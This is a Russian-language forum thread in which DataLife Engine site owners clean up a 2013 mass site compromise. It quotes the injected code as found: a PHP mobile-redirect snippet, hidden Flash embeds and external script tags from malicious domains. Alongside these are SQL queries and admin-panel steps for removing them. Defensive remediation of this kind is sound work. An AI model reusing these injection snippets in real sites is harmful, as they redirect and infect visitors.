C 6 сентября все страницы оказались с java-скриптом

[RedBaron 0]

Кстати вот такие строчки обнаружил в системных файлах

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {

header('Location: http://statuses.ws/');

}

подозреваю что это и есть тот самый вирус... так что проверяйте файлы:

index.php

engine/engine.php

engine/init.php

engine/data/config.php

engine/data/dbconfig.php

language/Russian/website.lng

[Olegazzz 0]

rifler,

Не нужно делать запросов, зайдите в админпанели в раздел "Перестроение публикаций" и сделайте в нем перестроение новостей. DLE сам удалит скрипты из новостей.

Мне не помогло, код остался

[celsoft 5 985]

Мне не помогло, код остался

Все зависит от того какой код у вас, перестроение убирает только JS скрипты. Если у вас не JS, то смотрите http://forum.dle-new...ndpost&p=320525

RedBaron,

У вас совсем другая проблема, вы не ставили вовремя совсем старые патчи, в зависимости от версии это либо http://dle-news.ru/b...-versii-97.html либо http://dle-news.ru/b...97-i-nizhe.html вам нужно читать тему http://forum.dle-news.ru/index.php?showtopic=62025&st=120&p=309347&#entry309347 и делать что там написано.

[qpool 0]

блин я нечего не пойму в каком фале скрипт сидит?? патч поставил ,Новости перестроил , код всеравно остался ((

вот код

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?881779831" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?378581582" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>

Изменено 13 сентября 2013 пользователем qpool

[Jiihuda 0]

mmmmm1501,

Jiihuda,

В данном случае нужно сделать бекап БД, открыть его в любом текстовом редакторе, например Notepad++ и провести поиск и замену в нем, в бекапе формат немного отличается, поэтому найдите сначала нужный код например по домену.

Беда еще в том, что обнаружились вот такие записи

<script async=\"async\" type=\"text/javascript\" src=\"http://google-webmaster.ru/XXXXXXXXXXXXXXXXX.js\"></script>

где XXXXXXXXXXXXXXXXX - 33 произвольных символа. И таких конструкций 48000 ....

Я не силен в Notepad++, поэтому подскажите пожалуйста есть ли возможность как-то искать этот код средствами поиска Notepad++ игнорируя XXXXXXXXXXXXXXXXX ? Может какими то звездочками их заменять или что-то типо-того...

[qpool 0]

mmmmm1501,

Jiihuda,

В данном случае нужно сделать бекап БД, открыть его в любом текстовом редакторе, например Notepad++ и провести поиск и замену в нем, в бекапе формат немного отличается, поэтому найдите сначала нужный код например по домену.

Беда еще в том, что обнаружились вот такие записи

<script async=\"async\" type=\"text/javascript\" src=\"http://google-webmaster.ru/XXXXXXXXXXXXXXXXX.js\"></script>

где XXXXXXXXXXXXXXXXX - 33 произвольных символа. И таких конструкций 48000 ....

Я не силен в Notepad++, поэтому подскажите пожалуйста есть ли возможность как-то искать этот код средствами поиска Notepad++ игнорируя XXXXXXXXXXXXXXXXX ? Может какими то звездочками их заменять или что-то типо-того...

а где такой код обнаружил подскажи!

[celsoft 5 985]

блин я нечего не пойму в каком фале скрипт сидит?? патч поставил ,Новости перестроил , код всеравно остался (( вот код

Ни к каком файле, он в БД. Это не скрипт, его перестроение не удалит. Этот код нужно удалять как написано в http://forum.dle-news.ru/index.php?showtopic=64224&view=findpost&p=320525

Беда еще в том, что обнаружились вот такие записи

А это уже JS скрипт, чтобы удалить их, просто в админпанели зайдите в перестроение публикаций и сделайте перестроение, DLE его автоматически удалит.

[qpool 0]

блин я нечего не пойму в каком фале скрипт сидит?? патч поставил ,Новости перестроил , код всеравно остался (( вот код

Ни к каком файле, он в БД. Это не скрипт, его перестроение не удалит. Этот код нужно удалять как написано в http://forum.dle-new...ndpost&p=320525

Беда еще в том, что обнаружились вот такие записи

А это уже JS скрипт, чтобы удалить их, просто в админпанели зайдите в перестроение публикаций и сделайте перестроение, DLE его автоматически удалит.

ничего не понял ,скачал базу открыл программой беру весь код вставляю в найти и хрен не находит , а просто ввожу какую то строчку 1 так находит !

И на что заменить то так и не понял просто ан пробел ??

[Jiihuda 0]

То qpool

Я в скачанном файле нашел фрагмент ограниченый обждексом и замешал его на пустую строку. В файле он по другому выглядит, чем выше в ветке этой темы. Проблема лично у меня в том, что Notepad++ замешает по 1000 фрагментов за 1 раз, а у меня их 48 000 и в какой то момент прога просто виснет )))

Завтра буду думать как это победить

Изменено 13 сентября 2013 пользователем Jiihuda

[qpool 0]

То qpool

Я в скачанном файле нашел фрагмент ограниченый обждексом и замешал его на пустую строку. В файле он по другому выглядит, чем выше в ветке этой темы. Проблема лично у меня в том, что Notepad++ замешает по 1000 фрагментов за 1 раз, а у меня их 48 000 и в какой то момент прога просто виснет )))

Завтра буду думать как это победить

у тебя 48 000 у меня 123 000((

Еще блин Яндекс пометил сайт как вирус посещении упало ((

Изменено 13 сентября 2013 пользователем qpool

[celsoft 5 985]

qpool,

Jiihuda,

Зайдите в phpMyAdmin и выполните запросы

UPDATE `dle_post` SET `short_story`=REPLACE(`short_story`,'ваш код который нужно найти и удалить','')

UPDATE `dle_post` SET `full_story`=REPLACE(`full_story`,'ваш код который нужно найти и удалить','')

UPDATE `dle_post` SET `xfields`=REPLACE(`xfields`,'ваш код который нужно найти и удалить','')

UPDATE `dle_comments` SET `text`=REPLACE(`text`,'ваш код который нужно найти и удалить','')

[/CODE]

Запросы нужно выполнить по одному.

[qpool 0]

qpool,

Jiihuda,

Зайдите в phpMyAdmin и выполните запросы

UPDATE `dle_post` SET `short_story`=REPLACE(`short_story`,'ваш код который нужно найти и удалить','')

UPDATE `dle_post` SET `full_story`=REPLACE(`full_story`,'ваш код который нужно найти и удалить','')

UPDATE `dle_post` SET `xfields`=REPLACE(`xfields`,'ваш код который нужно найти и удалить','')

UPDATE `dle_comments` SET `text`=REPLACE(`text`,'ваш код который нужно найти и удалить','')

Запросы нужно выполнить по одному.

вставляю свой код из короткой новости UPDATE `dle_post` SET `short_story`=REPLACE(`short_story`,'<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?932337055" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?27802376" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>','')

вот что пишет после запроса Затронуто строк: 0 (запрос занял 0.6940 сек.)

[Jiihuda 0]

Хм, то же самое. Пробовал ставить код, который брал из скачанного дампа

<object classid=\\\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\\\" width=\\\"1\\\" height=\\\"1\\\"><param name=\\\"movie\\\" value=\\\"http://webmasters-yandex.ru/flash.swf?488145815\\\" /><param name=\\\"quality\\\" value=\\\"high\\\" /><param name=\\\"scale\\\" value=\\\"exactfit\\\" /><param name=\\\"bgcolor\\\" value=\\\"#FFFFFF\\\" /><param name=\\\"AllowScriptAccess\\\" value=\\\"always\\\" /><embed src=\\\"http://webmasters-yandex.ru/flash.swf?366636152\\\" width=\\\"1\\\" height=\\\"1\\\" type=\\\"application/x-shockwave-flash\\\" allowscriptaccess=\\\"always\\\" pluginspage=\\\"http://www.macromedia.com/go/getflashplayer\\\"></embed></object>

и тоже ничего - 0 строк

В принципе, один сайт вылечил методом редактирования файла дампа вручную.

Изменено 14 сентября 2013 пользователем Jiihuda

[celsoft 5 985]

Jiihuda,

Откройте в phpMyAdmin любую новость и посмотрите как код зависан именно в phpMyAdmin, скопируйте его оттуда и выполните запросы.

[qpool 0]

Jiihuda,

Откройте в phpMyAdmin любую новость и посмотрите как код зависан именно в phpMyAdmin, скопируйте его оттуда и выполните запросы.

защел через phpMyAdmin в новость там это показывается так <script async="async" type="text/javascript" src="http://google-webmaster.ru/25b2822c2f5a3230abfadd476e8b04c9.js"></script> сделал запрос как вы написали в ответ мне Затронуто строк: 1 (запрос занял 1.8141 сек.) (( блин я уже не знаю что делать((

[celsoft 5 985]

qpool,

У вас JS скрипт. Читайте внимательно, что я писал выше. Для удаления JS скриптов никаких запросов делать не нужно, нужно зайти в админпанель DLE в раздел перестроения публикаций и сделать перестроение новостей. JS скрипты DLE удалит сам при перестроении.

[Astrolv 0]

Попробовал выполнить запрос:

UPDATE `dle_post` SET `short_story`=REPLACE(`short_story`,'<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?1306492186" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?672938198" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>','')

Пишет что затронуто 0 строк. Код копировал из PhpMyAdmin. Почему так? Заранее спасибо.

Вроде разобрался. Удалено 1000 строк, но новостей больше 7000. И заметил что разные адреса сайтов: webmasters-yandex.ru/flash.swf?672938198 в новостях, а именно цифры в конце. Как тогда таким методом удалить этот код можно?

Изменено 15 сентября 2013 пользователем Astrolv

[celsoft 5 985]

Astrolv,

Этих комбинаций не так много. Ищите просто по домену webmasters-yandex.ru и копируйте код и после чего удаляйте.

[qpool 0]

qpool,

У вас JS скрипт. Читайте внимательно, что я писал выше. Для удаления JS скриптов никаких запросов делать не нужно, нужно зайти в админпанель DLE в раздел перестроения публикаций и сделать перестроение новостей. JS скрипты DLE удалит сам при перестроении.

блин сдедал ка все описано перестроил нвоости уже 4 раза хрен не удоляется (

[celsoft 5 985]

qpool,

У вас при перестроении не удаляется код <script async="async" type="text/javascript" src="http://google-webmaster.ru/25b2822c2f5a3230abfadd476e8b04c9.js"></script> из новостей? Этого не может быть. Очистите кеш скрипта в админпанели скрипта после перестроения, может он у вас из кеша показывается.

[RedBaron 0]

Здравствуйте еще раз!

Спасибо администратору за помощь с тем вирусом справился исчезли страницы несуществующие в моем сайте и все вроде спокойно. Но яндекс всеравно определяет на сайте вирус... уже все перелопатил, кеш везде почистил (и на сайте и браузера) чтоб все видеть как есть.

Такие коды как описывают выше не нахожу... Может подскажите что еще может быть!

Вот результаты проверок антивирусниками

Результат выборочной проверки это яндекс

Дата последней проверки

Страница

Вердикт

13.09.2013

http://arsmotorsgrou...e_shaanxi1.html

Поведенческий анализ

Страницу пересмотрел и через базу ничего подозрительного нет... уже и все ссылки на посторонние сайты удалял еще неделю назад...

сейчас оставил повторную проверку всетаки это 13го было...

вот результаты проверок других антивирусников:

2ip походу ссылается на яндех

Подозрение на вирус!

На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.

Google.com относит данный сайт к безопасным

Yandex.ru относит данный сайт к опасным!

Еще проверил хостинговым антивирусом, доктор вебом и алярмом ничего не обноруживают никаких всплывающих окон...

Так же сам пытался найти вирус другим компом с виндоус ХП сп2 ИЭ 6 открывал сайт по разному нифига...

PS короче нужен совет, что делать? И возможно ли решить проблему установкой патча на 10 версию

PPS на хостинге несколько доменов интернет магазин и форум и тронут только ДЛЕ

PPPS или может просто дождаться очередной проверки яндексом...

Изменено 16 сентября 2013 пользователем RedBaron

[Hippo 0]

Нашел хороший совет по решению данной проблемы на форуме о поисковых системах (это не реклама стороннего ресурса, а просто ссылка аналогичной проблемы, обсуждаемая на другом форуме. Просьба к Администрации сурово не наказывать)

Простой способ по удалению дряни из новостей без прямого копания в базе и скриптов. В админке сайта в разделе "Поиск и замена" делаем замену object на script, а потом делаем перестроение публикаций. Все.

Мне пришлось пришлось пару раз делать замену: object на script, затем param name на script и embed на script. Потому как после замены object на script остается код вида:

<param name="movie" value="http://webmasters-yandex.ru/flash.swf?437160373"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?1024826446" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>[/PHP]

После данных замен сделал перестроение публикаций - как результат, чистые новости.

[celsoft 5 985]

RedBaron,

Ни один антивирус не показывает что у вас вирус https://www.virustotal.com/ru/url/394fd10f9d23abc0575ab1903c3676401f6741e418671bf7eb0499ac8a181773/analysis/1379327281/ кроме яндекса. Возможно яндекс еще не переиндексировал вашу страницу.

[marazm_ua 10]

Когда у меня Яндекс сказал о поведенческом анализе, то полез в .htaccess и там увидел мобильный редирект на вирусняк...

[willow300 0]

Может кто-нибудь возьмет на заметку... Я данную проблему решил банальным бекапом базы данных. Учитывая размеры БД - под 400 Мб, чистить, да и банально работать с ней было практически не реально. Учитывая, что после появления вредоносного кода, размер БД увеличился более чем на 100 Мб, четко можно было определить дату заражения... Я попросил хостера проверить по бекапам, когда увеличился объем БД и восстановить ее за день до увеличения. После бекапа сразу обновился до 10 версии и пока все норм. Из минусов данного способа - потеря новостей за несколько дней, но это ничтожно мало учитывая общий объем "излеченых" таким образом релизов.

Всем удачи.